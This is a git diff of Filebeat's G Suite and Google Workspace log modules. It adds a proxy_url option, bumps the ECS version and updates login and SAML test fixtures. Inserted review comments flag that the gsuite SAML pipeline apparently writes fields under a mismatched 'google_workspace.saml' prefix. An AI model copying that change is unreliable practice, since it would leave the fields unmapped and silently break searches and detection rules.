last_execution_datetime: - value: "[[now]]" + value: "[[formatDate now]]" {{ else if eq .input "file" }} type: log @@ -45,7 +48,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: gworkspace-common diff --git a/x-pack/filebeat/module/google_workspace/user_accounts/manifest.yml b/x-pack/filebeat/module/google_workspace/user_accounts/manifest.yml index 48570efe448..c5992776ac0 100644 --- a/x-pack/filebeat/module/google_workspace/user_accounts/manifest.yml +++ b/x-pack/filebeat/module/google_workspace/user_accounts/manifest.yml 
@@ -15,6 +15,7 @@ var: default: 2h - name: tags default: [forwarded] + - name: proxy_url input: config/config.yml ingest_pipeline: ../ingest/common.yml diff --git a/x-pack/filebeat/module/gsuite/admin/config/config.yml b/x-pack/filebeat/module/gsuite/admin/config/config.yml index 12e3730dc93..8313c8d1dc2 100644 --- a/x-pack/filebeat/module/gsuite/admin/config/config.yml +++ b/x-pack/filebeat/module/gsuite/admin/config/config.yml @@ -23,6 +23,10 @@ date_cursor.initial_interval: {{ .initial_interval }} pagination.id_field: nextPageToken pagination.url_field: pageToken +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} + {{ else if eq .input "file" }} type: log paths: @@ -39,7 +43,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: gsuite-common diff --git a/x-pack/filebeat/module/gsuite/admin/manifest.yml b/x-pack/filebeat/module/gsuite/admin/manifest.yml index 48570efe448..c5992776ac0 100644 --- a/x-pack/filebeat/module/gsuite/admin/manifest.yml +++ b/x-pack/filebeat/module/gsuite/admin/manifest.yml @@ -15,6 +15,7 @@ var: default: 2h - name: tags default: [forwarded] + - name: proxy_url input: config/config.yml ingest_pipeline: ../ingest/common.yml diff --git a/x-pack/filebeat/module/gsuite/drive/config/config.yml b/x-pack/filebeat/module/gsuite/drive/config/config.yml index 80583ee31b6..cd16f359b5b 100644 --- a/x-pack/filebeat/module/gsuite/drive/config/config.yml +++ b/x-pack/filebeat/module/gsuite/drive/config/config.yml @@ -23,6 +23,10 @@ date_cursor.initial_interval: {{ .initial_interval }} pagination.id_field: nextPageToken pagination.url_field: pageToken +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} + {{ else if eq .input "file" }} type: log paths: @@ -39,7 +43,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: gsuite-common 
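Review bot: In the gsuite/admin/config/config.yml hunk the added key is `request.proxy_url`, while the context lines around it (`date_cursor.initial_interval`, `pagination.id_field`, `pagination.url_field`) are flat, un-prefixed input options, unlike the `request.*` keys in the google_workspace configs. It is worth confirming that the input version this fileset runs accepts the `request.`-prefixed name; if it expects a flat option instead, the setting would be rejected or ignored and the collector's traffic would not go through the proxy the operator configured. A test that renders the fileset with `proxy_url` set and loads the resulting input config would settle it. The drive, groups and login config.yml hunks add the same key.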
diff --git a/x-pack/filebeat/module/gsuite/drive/manifest.yml b/x-pack/filebeat/module/gsuite/drive/manifest.yml index 48570efe448..c5992776ac0 100644 --- a/x-pack/filebeat/module/gsuite/drive/manifest.yml +++ b/x-pack/filebeat/module/gsuite/drive/manifest.yml @@ -15,6 +15,7 @@ var: default: 2h - name: tags default: [forwarded] + - name: proxy_url input: config/config.yml ingest_pipeline: ../ingest/common.yml diff --git a/x-pack/filebeat/module/gsuite/fields.go b/x-pack/filebeat/module/gsuite/fields.go index 1d4d320cd3b..b25ae2dec1f 100644 --- a/x-pack/filebeat/module/gsuite/fields.go +++ b/x-pack/filebeat/module/gsuite/fields.go @@ -19,5 +19,5 @@ func init() { // AssetGsuite returns asset data. // This is the base64 encoded gzipped contents of module/gsuite. func AssetGsuite() string { - return "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" + return "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" } diff --git a/x-pack/filebeat/module/gsuite/groups/config/config.yml b/x-pack/filebeat/module/gsuite/groups/config/config.yml index 75482518477..36d84b256b9 100644 --- a/x-pack/filebeat/module/gsuite/groups/config/config.yml +++ b/x-pack/filebeat/module/gsuite/groups/config/config.yml @@ -23,6 +23,10 @@ date_cursor.initial_interval: {{ .initial_interval }} pagination.id_field: nextPageToken pagination.url_field: pageToken +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} + {{ else if eq .input "file" }} type: log paths: @@ -39,7 +43,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: gsuite-common diff --git a/x-pack/filebeat/module/gsuite/groups/manifest.yml b/x-pack/filebeat/module/gsuite/groups/manifest.yml index 48570efe448..c5992776ac0 100644 --- a/x-pack/filebeat/module/gsuite/groups/manifest.yml +++ b/x-pack/filebeat/module/gsuite/groups/manifest.yml 
@@ -15,6 +15,7 @@ var: default: 2h - name: tags default: [forwarded] + - name: proxy_url input: config/config.yml ingest_pipeline: ../ingest/common.yml diff --git a/x-pack/filebeat/module/gsuite/login/config/config.yml b/x-pack/filebeat/module/gsuite/login/config/config.yml index ab40715bd4a..f5081efa434 100644 --- a/x-pack/filebeat/module/gsuite/login/config/config.yml +++ b/x-pack/filebeat/module/gsuite/login/config/config.yml @@ -23,6 +23,10 @@ date_cursor.initial_interval: {{ .initial_interval }} pagination.id_field: nextPageToken pagination.url_field: pageToken +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} + {{ else if eq .input "file" }} type: log paths: @@ -39,7 +43,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: gsuite-common diff --git a/x-pack/filebeat/module/gsuite/login/config/pipeline.js b/x-pack/filebeat/module/gsuite/login/config/pipeline.js index 0fb518b351d..2ad5d52f7de 100644 --- a/x-pack/filebeat/module/gsuite/login/config/pipeline.js +++ b/x-pack/filebeat/module/gsuite/login/config/pipeline.js @@ -64,7 +64,7 @@ var login = (function () { // this is a timestamp in microseconds case "timestamp": var millis = p.intValue / 1000; - evt.Put("event.start", new Date(millis).toUTCString()); + evt.Put("event.start", new Date(millis)); break; case "challenge_status": if (p.value === "Challenge Passed") { diff --git a/x-pack/filebeat/module/gsuite/login/manifest.yml b/x-pack/filebeat/module/gsuite/login/manifest.yml index 48570efe448..c5992776ac0 100644 --- a/x-pack/filebeat/module/gsuite/login/manifest.yml +++ b/x-pack/filebeat/module/gsuite/login/manifest.yml @@ -15,6 +15,7 @@ var: default: 2h - name: tags default: [forwarded] + - name: proxy_url input: config/config.yml ingest_pipeline: ../ingest/common.yml 
diff --git a/x-pack/filebeat/module/gsuite/login/test/gsuite-login-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/login/test/gsuite-login-test.json.log-expected.json index 261bf54dbf6..9bc77dc7d03 100644 --- a/x-pack/filebeat/module/gsuite/login/test/gsuite-login-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/login/test/gsuite-login-test.json.log-expected.json 
@@ -51,6 +51,162 @@ "user.id": "1", "user.name": "foo" }, + { + "event.action": "suspicious_login", + "event.category": [ + "authentication" + ], + "event.dataset": "gsuite.login", + "event.id": "1", + "event.module": "gsuite", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "info" + ], + "fileset.name": "login", + "gsuite.actor.type": "USER", + "gsuite.event.type": "account_warning", + "gsuite.kind": "admin#reports#activity", + "gsuite.login.affected_email_address": "foo@elastic.co", + "gsuite.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 406, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "gsuite", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" + }, + { + 
"event.action": "suspicious_login_less_secure_app", + "event.category": [ + "authentication" + ], + "event.dataset": "gsuite.login", + "event.id": "1", + "event.module": "gsuite", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login_less_secure_app\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "info" + ], + "fileset.name": "login", + "gsuite.actor.type": "USER", + "gsuite.event.type": "account_warning", + "gsuite.kind": "admin#reports#activity", + "gsuite.login.affected_email_address": "foo@elastic.co", + "gsuite.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 853, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "gsuite", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" + }, + { + "event.action": 
"suspicious_programmatic_login", + "event.category": [ + "authentication" + ], + "event.dataset": "gsuite.login", + "event.id": "1", + "event.module": "gsuite", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_programmatic_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "info" + ], + "fileset.name": "login", + "gsuite.actor.type": "USER", + "gsuite.event.type": "account_warning", + "gsuite.kind": "admin#reports#activity", + "gsuite.login.affected_email_address": "foo@elastic.co", + "gsuite.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 1316, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "gsuite", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" + }, { "event.action": "account_disabled_generic", "event.category": 
[ 
@@ -207,6 +363,59 @@ "user.id": "1", "user.name": "foo" }, + { + "event.action": "account_disabled_hijacked", + "event.category": [ + "authentication" + ], + "event.dataset": "gsuite.login", + "event.id": "1", + "event.module": "gsuite", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_hijacked\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "user", + "change" + ], + "fileset.name": "login", + "gsuite.actor.type": "USER", + "gsuite.event.type": "account_warning", + "gsuite.kind": "admin#reports#activity", + "gsuite.login.affected_email_address": "foo@elastic.co", + "gsuite.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 2992, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "gsuite", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + 
"user.name": "foo" + }, { "event.action": "gov_attack_warning", "event.category": [ diff --git a/x-pack/filebeat/module/gsuite/saml/_meta/fields.yml b/x-pack/filebeat/module/gsuite/saml/_meta/fields.yml index b7e9efc0926..fc0adfcb55c 100644 --- a/x-pack/filebeat/module/gsuite/saml/_meta/fields.yml +++ b/x-pack/filebeat/module/gsuite/saml/_meta/fields.yml @@ -18,10 +18,10 @@ description: > User orgunit. - name: status_code - type: long + type: keyword description: > SAML status code. - name: second_level_status_code - type: long + type: keyword description: > SAML second level status code. diff --git a/x-pack/filebeat/module/gsuite/saml/config/config.yml b/x-pack/filebeat/module/gsuite/saml/config/config.yml index 62f1e7d9f4e..2916eff9071 100644 --- a/x-pack/filebeat/module/gsuite/saml/config/config.yml +++ b/x-pack/filebeat/module/gsuite/saml/config/config.yml @@ -23,6 +23,10 @@ date_cursor.initial_interval: {{ .initial_interval }} pagination.id_field: nextPageToken pagination.url_field: pageToken +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} + {{ else if eq .input "file" }} type: log paths: @@ -39,7 +43,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: gsuite-common diff --git a/x-pack/filebeat/module/gsuite/saml/config/pipeline.js b/x-pack/filebeat/module/gsuite/saml/config/pipeline.js index 2011e6d437b..705db7f2f1e 100644 --- a/x-pack/filebeat/module/gsuite/saml/config/pipeline.js +++ b/x-pack/filebeat/module/gsuite/saml/config/pipeline.js 
@@ -32,14 +32,7 @@ var saml = (function () { // all saml event parameters are strings. // for this reason we know for sure they are in the 'value' field. // https://developers.google.com/admin-sdk/reports/v1/appendix/activity/saml - switch (p.name) { - case "status_code": - case "second_level_status_code": - evt.Put("gsuite.saml."+p.name, parseInt(p.value)); - break; - default: - evt.Put("gsuite.saml."+p.name, p.value); - } + evt.Put("google_workspace.saml."+p.name, p.value); }); evt.Delete("json.events.parameters"); diff --git a/x-pack/filebeat/module/gsuite/saml/manifest.yml b/x-pack/filebeat/module/gsuite/saml/manifest.yml index 48570efe448..c5992776ac0 100644 --- a/x-pack/filebeat/module/gsuite/saml/manifest.yml +++ b/x-pack/filebeat/module/gsuite/saml/manifest.yml @@ -15,6 +15,7 @@ var: default: 2h - name: tags default: [forwarded] + - name: proxy_url input: config/config.yml ingest_pipeline: ../ingest/common.yml diff --git a/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log b/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log index 678193e25d5..ed672b58a56 100644 --- a/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log +++ b/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log 
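Review bot: `evt.Put("google_workspace.saml."+p.name, p.value);` writes the SAML parameters under `google_workspace.saml.*`, although this is the gsuite module's pipeline and every other field in the updated expected output is still `gsuite.*` (`gsuite.event.type`, `gsuite.kind`, dataset `gsuite.saml`). This looks like a prefix carried over from another module: the `status_code` and `second_level_status_code` entries changed to `keyword` in this module's `fields.yml` presumably sit under `gsuite.saml`, so the emitted fields would have no declared mapping and existing searches or detection rules on `gsuite.saml.*` would silently stop matching. Unless the rename is intended, keep the module prefix, `evt.Put("gsuite.saml."+p.name, p.value);`, and regenerate the expected JSON. Dropping `parseInt` is consistent with the new test values such as `SUCCESS_URI`. The enclosing function starts outside the hunk.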
@@ -1,2 +1,2 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_failure","parameters":[{"name":"application_name","value":"app"},{"name":"failure_type","value":"failure_app_not_configured_for_user"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_second_level_status_code","value":"400"},{"name":"saml_status_code","value":"400"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:01Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_success","parameters":[{"name":"application_name","value":"app"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_status_code","value":"400"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_failure","parameters":[{"name":"application_name","value":"app"},{"name":"failure_type","value":"failure_app_not_configured_for_user"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_second_level_status_code","value":"SUCCESS_URI"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:01Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_success","parameters":[{"name":"application_name","value":"app"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}} diff --git a/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log-expected.json index 850766be83d..7763ca17881 100644 --- a/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log-expected.json 
@@ -8,23 +8,23 @@ "event.dataset": "gsuite.saml", "event.id": "1", "event.module": "gsuite", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"400\"},{\"name\":\"saml_status_code\",\"value\":\"400\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"SUCCESS_URI\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", "event.outcome": "failure", "event.provider": "saml", "event.type": [ "start" ], "fileset.name": "saml", + "google_workspace.saml.application_name": "app", + "google_workspace.saml.failure_type": "failure_app_not_configured_for_user", + "google_workspace.saml.initiated_by": "idp", + "google_workspace.saml.orgunit_path": "ounit", + "google_workspace.saml.second_level_status_code": "SUCCESS_URI", + 
"google_workspace.saml.status_code": "SUCCESS_URI", "gsuite.actor.type": "USER", "gsuite.event.type": "login", "gsuite.kind": "admin#reports#activity", "gsuite.organization.domain": "elastic.com", - "gsuite.saml.application_name": "app", - "gsuite.saml.failure_type": "failure_app_not_configured_for_user", - "gsuite.saml.initiated_by": "idp", - "gsuite.saml.orgunit_path": "ounit", - "gsuite.saml.second_level_status_code": 400, - "gsuite.saml.status_code": 400, "input.type": "log", "log.offset": 0, "organization.id": "1", 
@@ -66,23 +66,23 @@ "event.dataset": "gsuite.saml", "event.id": "1", "event.module": "gsuite", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"400\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", "event.outcome": "success", "event.provider": "saml", "event.type": [ "start" ], "fileset.name": "saml", + "google_workspace.saml.application_name": "app", + "google_workspace.saml.initiated_by": "idp", + "google_workspace.saml.orgunit_path": "ounit", + "google_workspace.saml.status_code": "SUCCESS_URI", "gsuite.actor.type": "USER", "gsuite.event.type": "login", "gsuite.kind": "admin#reports#activity", "gsuite.organization.domain": "elastic.com", - "gsuite.saml.application_name": "app", - "gsuite.saml.initiated_by": "idp", - "gsuite.saml.orgunit_path": "ounit", - "gsuite.saml.status_code": 400, "input.type": "log", - "log.offset": 606, + "log.offset": 622, "organization.id": "1", "related.ip": [ "98.235.162.24" 
diff --git a/x-pack/filebeat/module/gsuite/user_accounts/config/config.yml b/x-pack/filebeat/module/gsuite/user_accounts/config/config.yml index c6aa5ded144..2816afc8a67 100644 --- a/x-pack/filebeat/module/gsuite/user_accounts/config/config.yml +++ b/x-pack/filebeat/module/gsuite/user_accounts/config/config.yml @@ -23,6 +23,10 @@ date_cursor.initial_interval: {{ .initial_interval }} pagination.id_field: nextPageToken pagination.url_field: pageToken +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} + {{ else if eq .input "file" }} type: log paths: @@ -39,7 +43,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: gsuite-common diff --git a/x-pack/filebeat/module/gsuite/user_accounts/manifest.yml b/x-pack/filebeat/module/gsuite/user_accounts/manifest.yml index 48570efe448..c5992776ac0 100644 --- a/x-pack/filebeat/module/gsuite/user_accounts/manifest.yml +++ b/x-pack/filebeat/module/gsuite/user_accounts/manifest.yml @@ -15,6 +15,7 @@ var: default: 2h - name: tags default: [forwarded] + - name: proxy_url input: config/config.yml ingest_pipeline: ../ingest/common.yml diff --git a/x-pack/filebeat/module/ibmmq/errorlog/config/errorlog.yml b/x-pack/filebeat/module/ibmmq/errorlog/config/errorlog.yml index ac21107959c..8186eeb6b32 100644 --- a/x-pack/filebeat/module/ibmmq/errorlog/config/errorlog.yml +++ b/x-pack/filebeat/module/ibmmq/errorlog/config/errorlog.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/imperva/securesphere/config/input.yml b/x-pack/filebeat/module/imperva/securesphere/config/input.yml index 51f37f33c88..689c576dd23 100644 --- a/x-pack/filebeat/module/imperva/securesphere/config/input.yml +++ b/x-pack/filebeat/module/imperva/securesphere/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 
diff --git a/x-pack/filebeat/module/imperva/securesphere/test/generated.log-expected.json b/x-pack/filebeat/module/imperva/securesphere/test/generated.log-expected.json index 0c47319301b..240ab90bde8 100644 --- a/x-pack/filebeat/module/imperva/securesphere/test/generated.log-expected.json +++ b/x-pack/filebeat/module/imperva/securesphere/test/generated.log-expected.json @@ -23,13 +23,13 @@ "radipis5408.mail.local" ], "related.ip": [ - "10.70.155.35", - "10.81.122.126" + "10.81.122.126", + "10.70.155.35" ], "related.user": [ - "tatno", + "aqui", "magn", - "aqui" + "tatno" ], "rsa.counters.dclass_c1": 5910, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -112,12 +112,12 @@ "ccusan7572.api.home" ], "related.ip": [ - "10.159.182.171", - "10.58.116.231" + "10.58.116.231", + "10.159.182.171" ], "related.user": [ - "uradi", "temUten", + "uradi", "qua" ], "rsa.counters.dclass_c1": 3626, @@ -170,13 +170,13 @@ "elaudant5931.internal.invalid" ], "related.ip": [ - "10.18.124.28", - "10.232.27.250" + "10.232.27.250", + "10.18.124.28" ], "related.user": [ - "mquidol", "modocons", - "lapariat" + "lapariat", + "mquidol" ], "rsa.counters.dclass_c1": 6564, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -238,8 +238,8 @@ "10.6.137.200" ], "related.user": [ - "occae", "oluptas", + "occae", "intoc" ], "rsa.counters.event_counter": 7243, @@ -303,8 +303,8 @@ "eratv6205.internal.lan" ], "related.ip": [ - "10.36.194.106", - "10.179.124.125" + "10.179.124.125", + "10.36.194.106" ], "related.user": [ "acommod", @@ -316,8 +316,8 @@ "rsa.internal.event_desc": "osqui", "rsa.internal.messageid": "Imperva", "rsa.misc.action": [ - "lamcolab", - "accept" + "accept", + "lamcolab" ], "rsa.misc.category": "xerc", "rsa.misc.disposition": "iutali", 
@@ -370,13 +370,13 @@ "didunt1355.corp" ], "related.ip": [ - "10.129.149.43", - "10.211.105.204" + "10.211.105.204", + "10.129.149.43" ], "related.user": [ - "labor", + "orema", "eveli", - "orema" + "labor" ], "rsa.counters.dclass_c1": 6855, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -436,9 +436,9 @@ "10.112.250.193" ], "related.user": [ + "Exc", "ide", - "ipsumdol", - "Exc" + "ipsumdol" ], "rsa.counters.dclass_c1": 6852, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -497,9 +497,9 @@ "10.192.34.76" ], "related.user": [ + "ovol", "iquipe", - "tnonpro", - "ovol" + "tnonpro" ], "rsa.counters.dclass_c1": 3645, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -555,9 +555,9 @@ "10.59.138.212" ], "related.user": [ + "idunt", "archite", - "boree", - "idunt" + "boree" ], "rsa.counters.dclass_c1": 248, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -613,8 +613,8 @@ "rinre2977.api.corp" ], "related.ip": [ - "10.168.159.13", - "10.230.173.4" + "10.230.173.4", + "10.168.159.13" ], 